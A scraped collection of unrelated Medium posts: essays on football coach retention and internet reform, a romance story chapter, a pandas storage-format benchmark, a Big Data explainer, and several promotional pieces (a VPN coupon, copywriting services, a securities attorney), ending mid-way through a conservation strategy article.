The data shows that having a revolving door of head coaches does not lead to future success. If you believe in the head coach you hired because he was brought in for the right reasons, why are schools giving up on them because there are some bumps in the road in the first, second, or even third year? There is an old quote that “business is bad news, but if you can deal with the bad news each and every day, you’ll have success in business.”
We all know that professional and college football is definitely big business but it seems like so many times today, organizations and college athletic departments just run from the so-called bad news instead of working through it and ensuring each other that they supported by all.
So what if we administration thought differently? What if professional and collegiate football coaches knew they were not going to be dismissed if they don’t win right away? What if the culture of fear wasn’t in play and ‘psychological safety’ was instilled by the administration? Many global case studies show people are much more likely to do what it takes to build a team/program the right way, rather than focusing on shortcuts that might bring the team quicker success but not necessarily sustained success.
There have been a number of situations where NFL teams or college programs have chosen a head coaching candidate they believed in (who perhaps wasn’t a traditional or popular hire at the time), then stayed the course when things became tough.
The Pittsburgh Steelers have only had three head coaches in the last 51 years. The first coach in that trio, Chuck Noll, began his tenure in Pittsburgh with a 12–30 record during his first three years at the helm.
That is the kind of record that will typically get a coach sent to the unemployment line. But, despite that rough start, the Steelers kept their faith in Noll, who rewarded them with a dominant run that featured four Super Bowl victories (1975, 1976, 1979, 1980).
Bill Cowher was the next head coach of the Steelers, but unlike Noll, he got off to a fast start. However, in the middle of his run in Pittsburgh, he ran into some difficulties, going 22–26 from 1998–2000.
The team decided to stay the course, and Cowher turned things around quickly, leading to a great deal of further success and a Super Bowl victory in 2006.
Pittsburgh’s next and current coach, Mike Tomlin, also got off to a great start, winning the Super Bowl in 2009 in only his second year with the team.
But, much like his predecessor, his team hit a snag after a few years and posted back-to-back 8–8 records in 2012–13. As they are prone to do, the organization remained firm in their support of their head coach, and he bounced back with a 45–19 record over the next four seasons.
The New England Patriots are an example of an NFL franchise that made a hire that went very much against the standard hiring trends, and it paid off big-time.
When the Patriots hired Bill Belichick to be their head coach in 2000, his only previous head coaching experience in the NFL was his five years with the Cleveland Browns from 1991–95.
Belichick compiled a 36–44 record in Cleveland, but despite that, New England took a leap of faith, handing not only the head coaching duties to Belichick but nearly complete control of the team’s football operations — a very bold move given Belichick’s failure in his previous head coaching stint.
The result of this decision is legendary; Bill Belichick has established himself as arguably the most successful head coach in NFL history, appearing in nine Super Bowls, winning six.
The Patriots organization thought they saw something in a coach who had a losing record in his previous head coaching stop, and they chose to take the public relations hit because they believed in his ability to get the job done in New England.
The Minnesota Vikings are a team that has had among the lowest head coaching turnover in the NFL over the last several decades. In 1967, the Vikings hired Canadian Football League coach Bud Grant to lead their team.
Grant didn’t fare too well early on, going 11–14 during his first two seasons. However, things started to click in Year 3, and Grant went on to guide his team to four Super Bowl appearances in the ’70s, including a run of three out of four during the span 1974–77.
There are also many great examples of unusual hires and patience paying off in the college ranks…one of those is Kirk Ferentz at Iowa.
Ferentz was the head coach at the University of Maine from 1990–92, posting a rather poor 12–21 record. Hiring someone with this head coaching background is a hard sell to fans and boosters, but Iowa had confidence they found the right man for the job.
Things didn’t begin well at all for Ferentz at Iowa, as he compiled a 4–19 record in his first two years. It would have been easy to hit the eject button on Ferentz at this point, but the university did not.
Kirk Ferentz has gone on to a long and illustrious career leading the Hawkeyes program, winning three conference titles and appearing in a whopping 17 postseason Bowl games.
Texas Christian University (TCU) has shown patience with their head coach through several down periods, and that loyalty has been rewarded with a stellar 20-year run for the Horned Frogs football program.
TCU has had tremendous success under head coach Gary Patterson, who has elevated the team from a middling Division I program to one that many would consider a national power.
Despite Patterson’s outstanding record with the Horned Frogs, he has encountered some down years from time to time. The team dropped to 5–6 in 2004, only to rebound to 11–1 the next season.
By current TCU standards, the 8–5 season of 2007 was not a good one, but an 11–2 result followed in 2008. The team posted a two-year record of 11–14 in 2012–13, but again, came back very strong in 2014 (12–1).
2016 saw the Horned Frogs dip to 6–7, but an 11–3 mark followed the next season. Clearly, Patterson’s tenure in Fort Worth has had its ups and downs, but the school has remained steadfast in its support of Gary Patterson.
Pulling the plug on Patterson after a rough year or two, as some schools might have done, would have also potentially erased the most successful seasons in school history (11–1, 12–1, 13–0, 12–1), all of which came after these brief lulls.
For our final illustration from the college ranks, we’ll move to the Clemson Tigers. Dabo Swinney was named interim head coach of the team after Tommy Bowden’s resignation midway through the 2008 season.
Swinney posted a pedestrian 4–3 record for the remainder of 2008. Clemson supporters wanted the administration to hire a big-name head coach or at the very least a prominent assistant with previous head coaching experience.
The university decided to offer Dabo Swinney the head coaching position, which was a very unpopular decision among Tigers faithful. He had never been more than a position coach other than his seven games as Clemson’s interim head coach, and those results were not impressive.
As Swinney’s tenure began at Clemson, the masses who were so against the hire felt vindicated. Dabo Swinney’s teams went 19–15 in his first three years, a rather poor showing by Clemson standards.
But, the school stuck with their embattled head coach, and an incredible run of eight conference championships and two national championships began.
Making a quality hire based on what an organization believes is the right ‘fit’ is essential no matter where the candidate has coached in the past or what his last name is. Hiring is hard but ‘fit’ is something that needs to be explored more. Making million-dollar hiring decisions based on ‘one-year wonders’ or who will win the press conference is proving more and more to be wrong. And trust me, we are the first to know that having patience with your chosen coach doesn’t guarantee that your team will win a Super Bowl or a College Football Playoff National Championship. But, history and the data included in this article certainly states that working through troubled times together and getting better at your working relationships with your hire, can maximize your odds of success.
And that’s what successful decision-making in sports is all about. | https://medium.com/@chadqbrown/does-firing-your-football-coach-lead-to-success-we-dont-think-so-916292fcfea2 | ['Chad Q Brown'] | 2020-12-25 19:07:23.850000+00:00 | ['Firing', 'Hiring', 'Personality Tests', 'College Athletics', 'Firing Employees'] |
An Efft-Up Love Story | Chapter 4
Photo by Matthew T Rader on Unsplash
‘Are you nervous?’ ‘Should I be?’ ‘Turn left at the stop,’ Alison directs. ‘Well, my dad is a bit difficult.’ ‘Difficult?’ ‘Uh huh. My sister’s husband didn’t have it easy,’ Alison says and presses her lips. Lucious looks at Alison and takes her hand. ‘He’ll see that his baby girl has a real man,’ Lucious brags. Alison laughs at his confidence. She is nervous.
Her father was not impressed with the first boyfriend she brought home after her Matric year, maybe because he was not Christian.
‘The house with the black gate.’ Lucious exhales loudly. He parks in front of the gate. ‘Mommy, please open the gate.’
She looks at Lucious as they walk towards the front door. He holds her hand. To his surprise, she lets go off his hand the moment the front door opens.
‘My child!’ ‘Hello mommy,’ Alison greets her mom and introduces Lucious. ‘This is Lucious, my…’ ‘Please to meet you Lucious,’ she shakes his hand. ‘Please to meet you aunt Faith,’ he says confidently. ‘How was the road? I was telling your father, you should’ve come sooner, because the road will be very busy today.’ ‘It was very busy, but we didn’t have a choice but to leave today.’ ‘Kennith, the kids are here.’ Aunt Faith looks nervous, speaking properly and nicer than usual! They walk to the tv room where Alison’s dad’s sitting. ‘My girl! How’s daddy’s girl?’ They hug. ‘Hello daddy! I’m good thank you.’ She turns and looks at Lucious. ‘This is Lucious. Lucious this is my dad, Kennith.’ ‘Pleasure to meet you, sir.’ Her dad shakes his hand and nods awkwardly. ‘Sit,’ aunt Faith says and looks at Lucious. ‘Anyone for tea? Or Cold drink?’
Alison joins her mom in the kitchen to prepare drinks. She leaves Lucious in the tv room with her father. After serving cold drinks her mom enters with a plate. ‘My mom’s Melting Moments, you have to try them!’ she says trying to break the ice.
‘So, what do you do for a living Lucious?’ Uncle Kennith asks. ‘I own a hardware store,’ he answers confidently. Uncle Kennith looks confused. ‘I inherited it from my grandfather.’ ‘Oh!’ uncle Kennith answers quickly. ‘Where?’ Aunty Faith asks. ‘In Jo’burg.’ ‘It’s quite big now hey?’ Alison adds. ‘Yes, I extended the building two years ago.’ ‘There must be a lot of hardware stores around Jo’burg,’ uncle Kennith says concerned and unimpressed. It’s getting awkward. Alison gets up. ‘Let’s get the bags.’ They walk out and her parents remain sitting.
‘What’s your dad implying?’ ‘Nothing. He’s just trying to get to know you.’ Lucious doesn’t look happy.
They spend the afternoon with her parents until some of her aunties and cousins come over. They start cooking for Christmas lunch tomorrow. Aunty Faith makes her famous dessert, Trifle.
Lucious hangs out with Alison’s cousins. They brought a few drinks, they’re drinking secretly in the front yard. Every time uncle Kennith comes out to check on them or make random conversation, they hide their glasses underneath their chairs.
Alison is doing her hair and spending time with the aunties in the kitchen. She goes to Lucious every now and then so that he doesn’t complain about being neglected later on.
It’s almost 12:00, and the cousins are gathering outside. Lucious is far beyond tipsy. He doesn’t see Alison. He wants Alison. He wants her next to him.
He looks for her in the kitchen, but finds only aunties and the smell of ginger beer. Uncle Kennith, his suspicious stare and his brother-in-law are sitting in the tv room. ‘Alison!’ Lucious calls. He hears her voice down the hallway in one of the rooms. ‘Oh, here you are.’ She looks up at him. She’s sitting on the bed with her cousin. ‘Oh no,’ she says softly. ‘What?’ he asks obliviously. ‘It’s almost midnight. Let’s go outside,’ her cousin proposes and leaves the room. After she leaves Lucious closes the door behind her and falls on the bed next to Alison. He tries to kiss her. She pulls away, jumps up and looks terrified. ‘What are you doing?’ she whispers and opens the door. Lucious, looking very confused, asks ‘What’s up with you? Why can’t I kiss you?’ ‘Anyone can walk in.’ For a moment he is distracted by the noise her family makes outside. They hear hooters and people shouting, Merry Christmas!’ He looks at her, quickly gets up, shuts the door and presses her against the door. ‘Merry Christmas baby,’ he says, smiles and kisses her. She lets go of all her concerns and indulges it. His mouth is warm. She tastes whiskey. She actually loves this moment, having him all over her in her parents’ house. She puts her hands under his t-shirt, grabs his lower back and squeezes her body against his…
There’s a knock on the window. They stop kissing. She didn’t close the curtain yet! They freeze and she hides behind him. ‘Shit,’ she whispers and puts off the light. ‘Who was that?’ Lucious asks. ‘It could be anyone,’ she says and opens the door. Alison is annoyed. Lucious is too drunk to give a damn!
Alison feels too awkward to go outside. She tries to pull herself together and go out hoping it was one of her silly cousins knocking. Lucious walks carelessly behind her. They start wishing the people as they go, waiting for someone to say something about what just happened. No one looks guilty or upset until she sees her dad’s face standing next to his brother in-law, right in front her room’s window. Her energy drops to her heels. Her inner self jumps up and down and buries her head underground!
She is reluctant to go to her dad and uncle to wish them a merry Christmas. Lucious, on the other hand, walks over to them. Alison holds her breath and analyses her dad’s reaction. ‘He looks…upset,’ she thinks. Lucious stands and converses with them. ‘You have guts…’ she says softly while walking towards them. Her dad looks at her, they kiss and hug. It was him.
She is not like Lucious, she leaves immediately. Lucious forces conversation with her dad and uncle until her cousin’s husband calls him.
The sky is colourful and sparkling as the rockets whirl across the sky. The whole neighbourhood is celebrating. Alison and her family are gazing at the beautiful view. ‘It’s the Abrahams. They spend roughly R6000 on firework every festive season,’ Alison hears her dad telling her uncle.
After a while all the old people go into the house for tea and biscuits. The young people are doing what they do best, drinking undercover. The people start to leave. Alison and Lucious greet the last people and walk back into the house. ‘Can I have some of you?’ Lucious asks and kiss her neck while locking the door. ‘No,’ she whispers and giggles. ‘You scared we gonna wake your parents?’ he mocks. ‘Lucious stop it,’ she whispers and tries to steer clear of him while walking down the hallway. She goes to the bathroom. When she comes back she finds Lucious lying on her bed. She panicks. ‘You’re sleeping in the guest room.’ ‘Why?’ Alison pauses. ‘Where are you sleeping?’ ‘Here, in my room,’ she says. ‘Are you telling me that we are going to sleep apart?’ Alison presses her lips and nods. Lucious is agitated. ‘My parents won’t allow…’ Lucious gets up, ‘If I knew this I would’ve rather partied on.’ He leaves the room and Alison feels stupid.
Alison gets up early. She didn’t get much sleep after her boyfriend went to bed without saying good night. She makes him breakfast. When he wakes, he looks happy to see her. He pulls her closer, holds her and sleeps a while longer. She wiggles herself from his grip and wakes him.
Christmas lunch is the best, there’s always enough food for an army. The tables are packed with various drinks, snacks and desserts. Alison loves the family time and the yummy food but the amount of dishes waiting is enough to send her back to Jo’burg right now!
The young ladies sort out the kitchen. Some of the old people rest their eyes while the young ones chill outside. ‘I would give anything to just take a nap next to you right now,’ Lucious whispers. ‘I know, me too.’ ‘Will it be wrong of me to ask you to leave tomorrow?’ ‘On Boxing day? No, we can’t.’ Lucious sighs.
Late afternoon everyone leaves and the house is quiet. Alison and Lucious join her parents in front of the tv. ‘Your sister says the kids had a blast on the beach today,’ aunty Faith says to break the silence. Lucious takes part in the conversation until aunty Faith excuses herself. Her parents go to bed early. They finally have some alone time, they snuggle up and watch a movie. A few hours later Lucious starts kissing Alison. She gives in for two reasons. One, before he puts her in the car and rushes back to Jo’burg. And two, she wants to.
They stay for two more days. Lucious is okay with that now, as long as they can watch late night movies…
They leave for Jo’burg and Lucious is not bothered about uncle Kennith’s obvious dislike of him. | https://medium.com/@fakycm/an-efft-up-love-story-723d3004b0a9 | ['Faren M'] | 2020-10-07 10:01:24.449000+00:00 | ['Attraction', 'Lovestory', 'Family Traditions', 'Romance', 'Romance Novels'] |
The Best Format to Save Pandas Data | The Best Format to Save Pandas Data
A small comparison of various ways to serialize a pandas data frame to the persistent storage
When working on data analytical projects, I usually use Jupyter notebooks and a great pandas library to process and move my data around. It is a very straightforward process for moderate-sized datasets which you can store as plain-text files without too much overhead.
However, when the number of observations in your dataset is high, the process of saving and loading data back into the memory becomes slower, and now each kernel’s restart steals your time and forces you to wait until the data reloads. So eventually, the CSV files or any other plain-text formats lose their attractiveness.
We can do better. There are plenty of binary formats to store the data on disk, and many of them pandas supports. How can we know which one is better for our purposes? Well, we can try a few of them and compare! That’s what I decided to do in this post: go through several methods to save pandas.DataFrame onto disk and see which one is better in terms of I/O speed, consumed memory and disk space. In this post, I’m going to show the results of my little benchmark.
Photo by Patrick Lindenberg on Unsplash
Formats to Compare
We’re going to consider the following formats to store our data.
Plain-text CSV — a good old friend of a data scientist
Pickle — a Python’s way to serialize things
MessagePack — it’s like JSON but fast and small
HDF5 —a file format designed to store and organize large amounts of data
Feather — a fast, lightweight, and easy-to-use binary file format for storing data frames
Parquet — an Apache Hadoop’s columnar storage format
All of them are very widely used and (except MessagePack maybe) very often encountered when you’re doing some data analytical stuff.
Chosen Metrics
Pursuing the goal of finding the best buffer format to store the data between notebook sessions, I chose the following metrics for comparison.
size_mb — the size of the file (in Mb) with the serialized data frame
— the size of the file (in Mb) with the serialized data frame save_time — an amount of time required to save a data frame onto a disk
— an amount of time required to save a data frame onto a disk load_time — an amount of time needed to load the previously dumped data frame into memory
— an amount of time needed to load the previously dumped data frame into memory save_ram_delta_mb — the maximal memory consumption growth during a data frame saving process
— the maximal memory consumption growth during a data frame saving process load_ram_delta_mb — the maximal memory consumption growth during a data frame loading process
Note that the last two metrics become very important when we use the efficiently compressed binary data formats, like Parquet. They could help us to estimate the amount of RAM required to load the serialized data, in addition to the data size itself. We’ll talk about this question in more details in the next sections.
The Benchmark
I decided to use a synthetic dataset for my tests to have better control over the serialized data structure and properties. Also, I use two different approaches in my benchmark: (a) keeping generated categorical variables as strings and (b) converting them into pandas.Categorical data type before performing any I/O.
The function generate_dataset shows how I was generating the datasets in my benchmark.
The performance of CSV file saving and loading serves as a baseline. The five randomly generated datasets with million observations were dumped into CSV and read back into memory to get mean metrics. Each binary format was tested against 20 randomly generated datasets with the same number of rows. The datasets consist of 15 numerical and 15 categorical features. You can find the full source code with the benchmarking function and required in this repository.
(a) Categorical Features as Strings
The following picture shows averaged I/O times for each data format. An interesting observation here is that hdf shows even slower loading speed that the csv one while other binary formats perform noticeably better. The two most impressive are feather and parquet .
What about memory overhead while saving the data and reading it from a disk? The next picture shows us that hdf is again performing not that good. And sure enough, the csv doesn’t require too much additional memory to save/load plain text strings while feather and parquet go pretty close to each other.
Finally, let’s look at the file sizes. This time parquet shows an impressive result which is not surprising taking into account that this format was developed to store large volumes of data efficiently.
(b) Categorical Features Converted
In the previous section, we don’t make any attempt to store our categorical features efficiently instead of using the plain strings. Let’s fix this omission! This time we use a dedicated pandas.Categorical type instead of plain strings.
See how it looks now compared to the plain text csv ! Now all binary formats show their real power. The baseline is far behind so let’s remove it to see the differences between various binary formats more clearly.
The feather and pickle show the best I/O speed while hdf still shows noticeable overhead.
Now it is time to compare memory consumption during data process loading. The following bar diagram shows an important fact about parquet format we’ve mentioned before.
As soon as it takes a little space on the disk, it requires an extra amount of resources to un-compress the data back into a data frame. It is possible that you’ll not be able to load the file into the memory even if it requires a moderate volume on the persistent storage disk.
The final plot shows file sizes for the formats. All the formats show good results, except hdf that still requires much more space than others.
Conclusion
As our little test shows, it seems that feather format is an ideal candidate to store the data between Jupyter sessions. It shows high I/O speed, doesn’t take too much memory on the disk and doesn’t need any unpacking when loaded back into RAM. | https://towardsdatascience.com/the-best-format-to-save-pandas-data-414dca023e0d | ['Ilia Zaitsev'] | 2019-03-29 13:34:40.910000+00:00 | ['Data Science', 'Python', 'Pandas', 'Jupyter Notebook'] |
The Baby, The Bathwater and The Backlash | It’s been a long time coming. But not all that long. After 30 years of exploration, we find ourselves at war with the Internet we created.
Vices often begin as prescriptions for what ails us. It took about 100 years to first popularize and then condemn cigarette smoking. Before the 1800’s you could use cocaine and opioids quite freely to relieve symptoms of everything diarrhea to toothache. Gun use is still debated despite the toll they’ve taken on human life. And we are just beginning the great cannabis experiment as entire cities are ingesting and inhaling altered states.
So it shouldn’t come as much of a surprise that thirty years after its invention as mankind’s savior and the repository of all human knowledge, the Internet has been declared a toxic dump. Cleanup solutions span everything from abdicating to the tech titans to work things out to serious regulation. Already some early trendsetters are declaring themselves social media free and are limiting their online life with evangelistic ferver.
The mature Internet makes it childs play to damage a person’s life through bullying, manipulative practices, hate messages and misinformation, just to rattle off a few.
But walking away from the Internet would be like walking away from the invention of fire — an invention that’s served all of us well, and caused peril for some unfortunate others.
As we start building the next gen Internet, one that will be made of experiences based on 5G, AI and connected ubiquity, we have a chance to repair the potholes. Time to wise up and treat the Internet as the WWT (World Wide Treasure) it was meant to be. Think of it like the UNESCO for cyberspace — protect a heritage site but plan for future growth.
In the spirit of Swiftian Modest Proposals let me suggest a few things to avoid throwing the baby out with the bathwater
An Internet Drivers License Program
It’s as dangerous as a car so why not issue a license to drive it? I ‘ve been suggesting the notion of an Internet driver’s license since the early 90s. My suggestion then was as a way to prepare young digital citizens for the lives they would lead. Too late. Now those young citizens are young adults with very little, if any, Internet training other than the school of hard knocks. Time for us all to get driver’s licenses and at minimum be able to drive defensively on the information highway. If you’re walking around with a device in your pocket that has as more computing power than the first gen NASA spacecraft shouldn’t you get a modicum of training? A simple basic digital literacy test on how to distinguish fact from fiction, extricate yourself from nasty situations, trace origins of messages, etc. goes a long way. Plus, you should need to renew it every few years based on new technologies and new evils.
Require Registration and Proof Of Identity
We’re way past the “nobody knows you’re a dog” era. It’s time to woof up and identify yourself. End to end anonymity has not been kind to the Internet so let’s reinvent beginning with the notion that there is an owner behind an IP address. Total anonymity is not a tenet of modern life; the Internet is a part of modern life. Figure out the corollary. ICANN the body that manages addressable names on the Internet needs a serious makeover.
Ask Permission Once, Twice and Then Again
Have you noticed that many of your destination websites are now reminding you how you got there and what their business is? Three claps for them. The post-GDPR world is realizing that you shouldn’t have to read until page 63 of terms and conditions find out what type of information is being extracted.
School Detention for Bullies and Thieves
Schools needs to be a place where good habits are formed. A teacher shouldn’t have to compete for attention with YouTube. The price to pay for plagiarizing, bullying, spreading false rumors should be explicitly clear. A connection-free detention is something no kid wants. So let’s get on it.
The How Did I Get Here Button
You should be able to click a button and have it show you the circuitous route you took to wind up where you are on the web. They know how you got there, and so should you.
Yes, There are Innocent Victims but Not Always
We’ve been culturally complicit is making the Internet a cesspool. Too happy to click for free, too rushed to figure out why something seems off. Catch yourself in the act.
Are you following a torrid headline? Fueling the fires of a hurtful conversation? Too lazy to hit “block”. Yes, we are by nature, voyeuristic and filled with guilty pleasures and all too happy to blame someone else. A little self-blaming/shaming can go a long way.
Silver bullet solutions to what ails the Internet are nonexistent. But cleaning up the messier parts of online life is not beyond our talents. | https://medium.com/@robin.raskin/the-baby-the-bathwater-and-the-backlash-5b417a3ef3eb | ['Robin Raskin'] | 2019-03-19 15:31:08.908000+00:00 | ['Internet', 'Misinformation', 'Privacy', 'Online Safety', 'Bullying'] |
How to Write Killer Copy for Your Business | Photo by Glenn Carstens-Peters on Unsplash
As a business owner, you’ve got a lot to juggle. Taking care of customers, bookkeeping, and evaluating the market is more than enough to keep you stressed. But is it all doable? Totally.
Revamping the copy on that outdated, desperately-in-need-of-a-makeover website, on the other hand? OVERWHELMING.
Every word you write for your business is an opportunity to get new leads and convert casual browsers to buyers. So, if those words aren’t chosen carefully, you’re going to miss out on A LOT of opportunities (read: you’re going to lose a lot of money!)
It doesn’t matter how awesome your product or service is. If your copy isn’t snappy and persuasive, if it doesn’t connect with your readers and inspire them to buy…they’ll hit the back button, toss your brochure, or change the channel faster than you can say, “money-back guarantee.”
So, use these copywriting 101 tips when writing all of your marketing materials. If you follow these guidelines, you’ll be converting casual readers to raving fans — and paying customers — in no time.
1. Decide how you want them to feel. Humans don’t buy strictly based on need. We buy what we WANT. Because of how it makes us FEEL. So, effective copy connects with consumers on an emotional level. Do you want to inspire them with the opportunities your service makes possible? Or unsettle them into buying your product for the sake of their health and safety? Identify how you want your readers to feel and write with that in mind. Bonus tip: brainstorm “power words” that evoke the emotion you want your customers to feel and sprinkle them in your copy.
2. Utilize the power of “you.” Sorry to break it to you but no one cares about your company. They care about themselves; they care about what your company can do for them. So, stop talking about yourself and your accomplishments. Address your customers directly. And tell them what’s in it for them to buy from you. Better yet, SHOW them. Focus on benefits over features and show them what their lives will be like with your product or service in it.
3. Write the way you speak. If your copy reads like a scientific paper or textbook, it’s either going to turn your readers off immediately or go right over their heads. Great copy has a casual tone and uses short, easy-to-understand words. It’s your salesperson on paper (or computer screen.) So make it sound like a human being.
4. Be concise. We’re being flooded with so much information on a daily basis, our attention spans are getting shorter and shorter. According to Oracle.com, studies show the average human attention span dropped from 12 seconds to just 8 seconds between the years 2000 and 2015. So get to the point, fast. Great stories are engaging but try to say more with less.
5. When all else fails, hire a professional copywriter. OK — obviously, this isn’t a tip for writing your own copy. But it bears including in this list. Because, sometimes, writing is just not your thing. And that’s ok! Writing persuasive copy takes time, hard work, and loads of practice. So, if you don’t have the time or energy to invest, outsource your project to a pro. Look for a certified copywriter with an eye for detail and an obsession with proper grammar.
In Conclusion
Writing killer copy for your business is not an easy task. If you follow these guidelines, you’ll be one step ahead of your competitors. But, if you’re short on time or just don’t have the inspiration, let me do the heavy lifting for you.
You deserve to be raking in the cash — not wracking your brain over how to grow your business. No more worrying about turning your features into benefits, using proper grammar, or sounding too sales-y. And no more burning the late-night oil, trying to complete yet another task.
I’m a certified copywriter who’s studied with Tamsin Henderson, one of the best copywriting teachers on this side of the equator. And I use a tested, tried-and-true approach that inspires your readers and makes your business sparkle. Visit copybycarrie.com for details today! | https://medium.com/@carriefsolomon/how-to-write-copy-for-your-business-83f41e33f85d | ['Carrie Solomon'] | 2021-01-19 20:47:01.175000+00:00 | ['Copywriting Services', 'Small Business Owner', 'Business Writing Skills', 'Copywriting', 'Copywriting Tips'] |
Josh Cahill Presents Coupon For Surfshark VPN | Josh Cahill is a travel expert and always looking for adventures. Also he is a huge fan of airplanes. On his Youtube channel you can find all sorts of airline reviews, inspiration for travel destinations and places to visit there.
Recently Josh partnered up with Surfshark VPN which is a useful tool to have while traveling, both for security purposes and both for bypassing all sorts of geographical restrictions worldwide. Josh also presented a 82% coupon code for 2-years plan of Surfshark (and also you get 1 month for free). This is a guide on how to get it.
How to get Josh Cahill VPN coupon code
Go to Surfshark website here
Insert the coupon code cahill
Or follow this link: https://surfshark.com/deals?coupon=cahill
Sign up with your email and continue the purchase
With this coupon code you will get an 82% discount for 2-years plan of Surfshark + 1 month for free. This will cost you $2.39 per month.
Surfshark coupon
Why Surfshark
The most important features you need to look for in VPN is how they manage to keep their customer anonymous online. Surfshark does this by following a strict no logs policy and avoiding data collection laws, since they are based in a privacy friendly location. Also they offers such advanced features as built-in kill-switch, GPS spoofers, DNS and IP leak protection, P2P servers for anonymous torrenting. Also they use industry leading encryption and offers fast servers worldwide.
Surfshark stand out from other VPNs by supporting an unlimited number of devices, when other VPNs usually support up to 7 devices per one account. So you will be able to share one account with your family or friends. Surfshark is also liked between people who use VPN for streaming and for bypassing geographical restrictions. This VPN works well with major streaming platforms like Netflix, also it manages to bypass firewalls and any kind of restrictions online.
Lastly, Surfshark offers built-in ad-blocker, 24/7 customer support, 30-day money back guarantee.
Get Surfshark with 82% discount here
Watch Josh Cahill Youtube channel here | https://medium.com/@entrentert/josh-cahill-presents-coupon-for-surfshark-vpn-bb4116dfaeec | ['Trevor E.'] | 2020-09-11 08:29:23.634000+00:00 | ['Discount', 'Promotion', 'Coupon', 'VPN', 'Deal'] |
Cryptocurrency — The SEC’s Position — Part 2 of 5 | Video posted: Dec. 3, 2018
Darin Mangum
Cryptocurrency- The SEC’s Position Video Part 2 of 5. In this video I discuss the how the Securities Exchange Commission looks at Cryptocurrency investment offerings or any blockchain investment. It is important to know where the SEC stands and how to be compliant with their position in order to stay free of unwanted investigations and possible fraud charges if your Private Placement Memorandum is not in order.
As a Private Placement Memorandum Attorney, I specialize in keeping your blockchain, ICO / Offering out of scrutiny with the SEC and other regulatory bodies.
I offer a no cost or obligation consultation about your PPM offering / business venture. Thanks for watching and subscribing! :-)
Phone: (281) 203–0194
E-mail: darin@theppmattorney.com
Website: www.ThePPMAttorney.com
FOR GENERAL INFORMATION ONLY. NOT TO BE CONSTRUED AS LEGAL ADVICE. I’M NOT YOUR ATTORNEY UNLESS A DULY EXECUTED ENGAGEMENT LETTER EXISTS BETWEEN US. © 2018 DARIN H. MANGUM PLLC. | https://medium.com/@darinmangumlaw/cryptocurrency-the-secs-position-part-2-of-5-1bec13605dbd | ['Darin Mangum'] | 2021-06-08 14:51:33.062000+00:00 | ['Compliance', 'Initial Coin Offering', 'ICO', 'Blockchain', 'Cryptocurrency'] |
Big Data 3 V’s and 5 V’s | Recently, we study the definition and concept of big data. Now, question is “How to identify Big Data?” To explore answer for this question refer following paragraphs.
The characteristics of Big Data are categorized in various types of V’s concepts. The main types of V’s are 3 V’s and 5 V’s which demonstrated the pillars of Big Data in brief. In order to identify big data it is necessary to acquire following characteristics. It is very efficient way to understand actually “What is Big Data” and “How can identify it?”.
“The big data stands on mainly 5 pillars are Volume, Velocity, Variety, Veracity and Value.These pillars are briefly describes in 3 V’s and 5 V’s architectures.”
Photo by rawpixel from Burst
Following paragraphs demonstrates 3 V’s and 5 V’s:
3 V’s:
3 V’s contains 3 main characteristics of Big Data. These characteristics are Volume, Velocity and Variety. Each keyword are self explanatory. Each *characteristics demonstrate separate physical as well as logical attributes.
Edited/Created by Author
1) Volume:
i. In big data, Volume is the huge set of data which has huge form. ii. The volume describes the huge set of data which is very complex to process further for extracting valuable information from it. iii. Volume does not describe actual size to grant it as big data, it have relatively big size. The size could be in Terabyte, Exabyte or even in Zettabyte. iv. The size of big data makes perplex it to process.
Photo by Markus Spiske on Unsplash
Data Measurement Rows: 1. Bit is an eighth of a byte 2. Byte: 1 Byte 3. Kilobyte: 1 thousand or, 1,000 bytes 4 .Megabyte: 1 million, or 1,000,000 bytes 5 .Gigabyte: 1 billion, or 1,000,000,000 bytes 6. Terabyte: 1 trillion, or 1,000,000,000,0000 bytes 7. Petabye: 1 quadrillion, or 1,000,000,000,000,000 bytes 8. Exabyte: 1 quintillion, or 1,000,000,000,000,000,000 bytes 9. Zettabyte: one sextillion or 1,000,000,000,000,000,000,000 10. Yottabyte: 1 septillion, or 1,000,000,000,000,000,000,000,000 bytes For Example : The world generates 2.5 Quintillion bytes of data per day.
2) Velocity:
i. In big data, Velocity demonstrate two things mainly, (1) Speed of growth of data (2) Speed of transmission of data ii. Velocity refers to data generating, increasing and sharing at a particular speed through the resources.
Edited/Created by Author
iii. Speed of growth of data: The data increases day by day through various resources. Some of the resources are explained below, Internet Of Things (IOT): IOT is prominent for contributing in big data. It generates data through IOT devices placed in automated vehicles, digital IOT bulbs, IOT based robots etc. Social Media: As you see, users on social media increasing day by day so that they exactly generating huge batches of data. Such as many other resources, who generates data at such high speeds. iv. Speed of transmission of data: The speed is also take major role in identifying big data. Big data increasing in rapid fast manner which makes it very complex to process fast and makes difficult to transmit it quickly through fiber optic or electromagnetic way of transmission. Therefore this term is very important to demonstrate velocity. For Example : Twitter generates 500 Million tweets per day, rate of speed of generation of data and rate of speed of transmission of data is very high.
3) Variety:
i. In big data, Variety is nothing but different types of data. ii. This term demonstrate various types of data such as texts, audios, videos, XML file, data in rows and columns etc. iii. Each type of data have separate way to process itself therefore, it is necessary to categorize different types of data. iv. In Big Data, data is categorize in mainly three types as follows,
Edited/Created by Author
a. Structured Data: The data which is in the format of relational database and have structured properly in rows and columns format is known as Structured Data. b. Unstructured Data: The data which includes various types of data such as audio, video, XML file, word file etc. and does not organize in proper format then it is said to be Unstructured Data. c. Semi-structured Data: Semi-structured data is self-explanatory that it is the data which not fully structured or unstructured. In it, data is partially structured and mixed with unstructured format of data. For Example: The social media contains photos, videos and texts of people in huge figure. This data is nothing but big data, it can be well-structured or unstructured or semi-structured.
The concept of 3 V’s explains the basic architecture of big data but 5 V’s fulfill some more requirements to make it well demonstrated. Following paragraph explain architecture of 5 V’s concept. | https://medium.com/analytics-vidhya/big-data-3-vs-and-5-v-s-c1cae2a6d311 | ['Shubham Rajput'] | 2020-07-02 05:42:09.138000+00:00 | ['Technology', 'Data Science', 'Future', 'Big Data', 'Big Data Analytics'] |
Strategy Development for the Budding Wildlife Conservationist | Principles Stand Out
The extensive amount of content to be covered could have easily been made overwhelming and disconnected were an anchor absent. Said anchor was found in the six guiding Principles, intended to guide overall strategy development and consistently remind participants what is and is not vitally important to achieving appropriate objectives and project outcomes. They are as follows:
Keep It Wild
Monarch butterflies migrate in Fall and Winter and aggregate at night to retain warmth. It’s a good *strategy* to ensure survival! || Photo by Alex Guillaume on Unsplash
In essence, the priority of a project should always be conservation impact, defined as
“ measured positive change in biodiversity target results, threat results, behavior results, and contributing factor results ”
These impacts could be:
an improved status of a population e.g. migratory western monarch butterflies (biodiversity target result)
a reduction in harmful direct threats e.g. habitat loss (threat result)
